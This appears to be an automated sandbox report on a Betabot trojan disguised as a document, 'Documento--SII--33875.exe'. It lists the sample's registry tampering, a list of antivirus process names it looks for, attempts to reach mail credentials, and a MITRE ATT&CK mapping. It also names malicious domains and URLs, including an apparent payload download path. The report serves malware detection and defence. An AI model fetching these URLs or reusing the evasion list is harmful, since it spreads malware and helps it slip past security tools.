Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\Documento--SII--33875.exe

Code function: 1_2_004295F5 GetSystemTimeAsFileTime,

Source: C:\Users\user\Desktop\Documento--SII--33875.exe

Code function: 1_2_0042997E GetTimeZoneInformation,

Source: C:\Users\user\Desktop\Documento--SII--33875.exe

Code function: 1_2_0044E930 GetVersionExA,_fast_error_exit,_fast_error_exit,GetStartupInfoW,GetModuleHandleA,

Lowering of HIPS / PFW / Operating System Security Settings:

Modifies Internet Explorer zone settings

Show sources

Source: C:\Windows\SysWOW64\explorer.exe	Registry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 2500	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Registry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 2500	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Registry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 2500	Jump to behavior

Source: Documento--SII--33875.exe	Binary or memory string: Firewall\GDFwSvc.exe
Source: Documento--SII--33875.exe	Binary or memory string: Windows Defender\MSASCui.exe
Source: Documento--SII--33875.exe	Binary or memory string: mcagent.exe
Source: Documento--SII--33875.exe	Binary or memory string: AVKTray\AVKTray.exe
Source: Documento--SII--33875.exe	Binary or memory string: avcenter.exe
Source: Documento--SII--33875.exe	Binary or memory string: cfp.exe
Source: Documento--SII--33875.exe	Binary or memory string: SBAMTray.exe
Source: Documento--SII--33875.exe	Binary or memory string: sched.exe
Source: Documento--SII--33875.exe	Binary or memory string: mcshield.exe
Source: Documento--SII--33875.exe	Binary or memory string: AVK\AVKService.exe
Source: Documento--SII--33875.exe	Binary or memory string: Firewall\GDFirewallTray.exe
Source: Documento--SII--33875.exe	Binary or memory string: avgui.exe
Source: Documento--SII--33875.exe	Binary or memory string: avgwdsvc.exe
Source: Documento--SII--33875.exe	Binary or memory string: pctsSvc.exe
Source: Documento--SII--33875.exe	Binary or memory string: avgupd.exe
Source: Documento--SII--33875.exe	Binary or memory string: MsMpEng.exe
Source: Documento--SII--33875.exe	Binary or memory string: mcupdate.exe
Source: Documento--SII--33875.exe	Binary or memory string: a2service.exe
Source: Documento--SII--33875.exe	Binary or memory string: pctsAuxs.exe
Source: Documento--SII--33875.exe	Binary or memory string: MSASCui.exe
Source: Documento--SII--33875.exe	Binary or memory string: avguard.exe
Source: Documento--SII--33875.exe	Binary or memory string: BullGuard.exe
Source: Documento--SII--33875.exe	Binary or memory string: avp.exe
Source: Documento--SII--33875.exe	Binary or memory string: pctsGui.exe
Source: Documento--SII--33875.exe	Binary or memory string: AVENGINE.exe
Source: Documento--SII--33875.exe	Binary or memory string: a2start.exe
Source: Documento--SII--33875.exe	Binary or memory string: avgnt.exe
Source: Documento--SII--33875.exe	Binary or memory string: FPWin.exe
Source: Documento--SII--33875.exe	Binary or memory string: procexp.exe
Source: Documento--SII--33875.exe	Binary or memory string: a2guard.exe
Source: Documento--SII--33875.exe	Binary or memory string: mbam.exe
Source: Documento--SII--33875.exe	Binary or memory string: RavMonD.exe
Source: Documento--SII--33875.exe	Binary or memory string: sbamui.exe
Source: Documento--SII--33875.exe	Binary or memory string: op_mon.exe
Source: Documento--SII--33875.exe	Binary or memory string: FProtTray.exe

Source: C:\Users\user\Desktop\Documento--SII--33875.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\9sek3aw7533q9.exe DisableExceptionChainValidation

Jump to behavior

Stealing of Sensitive Information:

Yara detected Betabot

Show sources

Source: Yara match	File source: 00000005.00000002.551764489.0000000004650000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.544987662.0000000003BD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.530193704.0000000003AD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.544278949.0000000004060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.536031324.0000000003740000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.281228510.0000000002160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.546008227.00000000041D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.542937033.0000000003ED0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.530417104.0000000003DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.299241171.00000000008C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.519183490.0000000002A00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.266297268.0000000000960000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.236019487.00000000022A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.526598639.0000000004000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.545447794.0000000003B70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.539566697.0000000003B10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.556445822.0000000004470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3696, type: MEMORY
Source: Yara match	File source: Process Memory Space: Documento--SII--33875.exe PID: 4948, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9sek3aw7533q9.exe PID: 6616, type: MEMORY
Source: Yara match	File source: Process Memory Space: CpSHySoEfzH.exe PID: 3332, type: MEMORY
Source: Yara match	File source: Process Memory Space: CpSHySoEfzH.exe PID: 2188, type: MEMORY
Source: Yara match	File source: Process Memory Space: CpSHySoEfzH.exe PID: 2036, type: MEMORY
Source: Yara match	File source: Process Memory Space: CpSHySoEfzH.exe PID: 3060, type: MEMORY
Source: Yara match	File source: Process Memory Space: CpSHySoEfzH.exe PID: 4612, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9sek3aw7533q9.exe PID: 5704, type: MEMORY
Source: Yara match	File source: Process Memory Space: CpSHySoEfzH.exe PID: 2248, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9sek3aw7533q9.exe PID: 6208, type: MEMORY
Source: Yara match	File source: Process Memory Space: CpSHySoEfzH.exe PID: 4668, type: MEMORY
Source: Yara match	File source: 5.2.CpSHySoEfzH.exe.4650000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.CpSHySoEfzH.exe.3bd0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.9sek3aw7533q9.exe.2160000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.9sek3aw7533q9.exe.8c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.explorer.exe.2a00000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.9sek3aw7533q9.exe.960000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.CpSHySoEfzH.exe.4060000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.CpSHySoEfzH.exe.4470000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.CpSHySoEfzH.exe.3b10000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.CpSHySoEfzH.exe.3ed0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CpSHySoEfzH.exe.3b70000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.CpSHySoEfzH.exe.41d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Documento--SII--33875.exe.22a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.CpSHySoEfzH.exe.3740000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.CpSHySoEfzH.exe.4000000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.CpSHySoEfzH.exe.3dd0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.CpSHySoEfzH.exe.3ad0000.1.raw.unpack, type: UNPACKEDPE

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: C:\Windows\SysWOW64\explorer.exe	File opened / queried: C:\Users\user\AppData\Roaming\.minecraft
Source: C:\Windows\SysWOW64\explorer.exe	File opened / queried: C:\Program Files (x86)\League of Legends

Remote Access Functionality:

Yara detected Betabot

Show sources

Source: Yara match	File source: 00000005.00000002.551764489.0000000004650000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.544987662.0000000003BD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.530193704.0000000003AD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.544278949.0000000004060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.536031324.0000000003740000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.281228510.0000000002160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.546008227.00000000041D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.542937033.0000000003ED0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.530417104.0000000003DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.299241171.00000000008C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.519183490.0000000002A00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.266297268.0000000000960000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.236019487.00000000022A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.526598639.0000000004000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.545447794.0000000003B70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.539566697.0000000003B10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.556445822.0000000004470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3696, type: MEMORY
Source: Yara match	File source: Process Memory Space: Documento--SII--33875.exe PID: 4948, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9sek3aw7533q9.exe PID: 6616, type: MEMORY
Source: Yara match	File source: Process Memory Space: CpSHySoEfzH.exe PID: 3332, type: MEMORY
Source: Yara match	File source: Process Memory Space: CpSHySoEfzH.exe PID: 2188, type: MEMORY
Source: Yara match	File source: Process Memory Space: CpSHySoEfzH.exe PID: 2036, type: MEMORY
Source: Yara match	File source: Process Memory Space: CpSHySoEfzH.exe PID: 3060, type: MEMORY
Source: Yara match	File source: Process Memory Space: CpSHySoEfzH.exe PID: 4612, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9sek3aw7533q9.exe PID: 5704, type: MEMORY
Source: Yara match	File source: Process Memory Space: CpSHySoEfzH.exe PID: 2248, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9sek3aw7533q9.exe PID: 6208, type: MEMORY
Source: Yara match	File source: Process Memory Space: CpSHySoEfzH.exe PID: 4668, type: MEMORY
Source: Yara match	File source: 5.2.CpSHySoEfzH.exe.4650000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.CpSHySoEfzH.exe.3bd0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.9sek3aw7533q9.exe.2160000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.9sek3aw7533q9.exe.8c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.explorer.exe.2a00000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.9sek3aw7533q9.exe.960000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.CpSHySoEfzH.exe.4060000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.CpSHySoEfzH.exe.4470000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.CpSHySoEfzH.exe.3b10000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.CpSHySoEfzH.exe.3ed0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CpSHySoEfzH.exe.3b70000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.CpSHySoEfzH.exe.41d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Documento--SII--33875.exe.22a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.CpSHySoEfzH.exe.3740000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.CpSHySoEfzH.exe.4000000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.CpSHySoEfzH.exe.3dd0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.CpSHySoEfzH.exe.3ad0000.1.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	LSASS Driver1	LSASS Driver1	Disable or Modify Tools21	OS Credential Dumping	System Time Discovery2	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Image File Execution Options Injection1	Image File Execution Options Injection1	Deobfuscate/Decode Files or Information1	LSASS Memory	File and Directory Discovery1	Remote Desktop Protocol	Man in the Browser1	Exfiltration Over Bluetooth	Encrypted Channel12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Shared Modules1	Registry Run Keys / Startup Folder11	Process Injection612	Obfuscated Files or Information2	Security Account Manager	System Information Discovery45	SMB/Windows Admin Shares	Data from Local System1	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Registry Run Keys / Startup Folder11	Software Packing21	NTDS	Security Software Discovery441	Distributed Component Object Model	Email Collection1	Scheduled Transfer	Application Layer Protocol24	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading1	LSA Secrets	Virtualization/Sandbox Evasion24	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion24	Cached Domain Credentials	Process Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection612	DCSync	Application Window Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Hidden Files and Directories1	Proc Filesystem	Remote System Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	NTFS File Attributes1	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Documento--SII--33875.exe	49%	Virustotal		Browse
Documento--SII--33875.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\iom7q73oi.exe	100%	Avira	TR/Spy.Gen
C:\Users\user\AppData\Local\Temp\9sek3aw7533q9_1.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\9sek3aw7533q9_1.exe	40%	ReversingLabs	Win32.Trojan.Neurevt
C:\Users\user\AppData\Local\Temp\agq5ooig7au.exe	47%	ReversingLabs	ByteCode-MSIL.Trojan.Wacatac
C:\Users\user\AppData\Local\Temp\iom7q73oi.exe	21%	ReversingLabs	Win32.Trojan.Wacatac

Unpacked PE Files

Source	Detection	Scanner	Label	Download
14.1.9sek3aw7533q9.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
3.2.explorer.exe.e0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.1.Documento--SII--33875.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
3.2.explorer.exe.6870000.6.unpack	100%	Avira	TR/Dropper.Gen	Download File
33.2.9sek3aw7533q9_1.exe.11d0000.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
2.2.Documento--SII--33875.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
31.2.9sek3aw7533q9.exe.1180000.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
1.2.Documento--SII--33875.exe.11c0000.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
14.2.9sek3aw7533q9.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
34.2.iom7q73oi.exe.400000.0.unpack	100%	Avira	TR/Spy.Gen	Download File
32.2.9sek3aw7533q9.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
32.1.9sek3aw7533q9.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
19.2.9sek3aw7533q9.exe.11e0000.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
21.1.9sek3aw7533q9.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
21.2.9sek3aw7533q9.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
34.0.iom7q73oi.exe.400000.0.unpack	100%	Avira	TR/Spy.Gen	Download File
11.2.9sek3aw7533q9.exe.12e0000.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File

Domains

Source	Detection	Scanner	Link
zakriasons.co	4%	Virustotal	Browse
estrelladamm.icu	2%	Virustotal	Browse
rusianlover.icu	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://rusianlover.icu/forum/logout.php?id=1809723	0%	Avira URL Cloud	safe
http://estrelladamm.icu/get.php__vbaVarSetVar	0%	Avira URL Cloud	safe
http://rusianlover.icu/forum/logout.php?page=7	0%	Avira URL Cloud	safe
http://estrelladamm.icu/old/GetDataAVK.exe	4%	Virustotal		Browse
http://estrelladamm.icu/old/GetDataAVK.exe	0%	Avira URL Cloud	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://rusianlover.icu/forum/logout.php?id=5263631	0%	Avira URL Cloud	safe
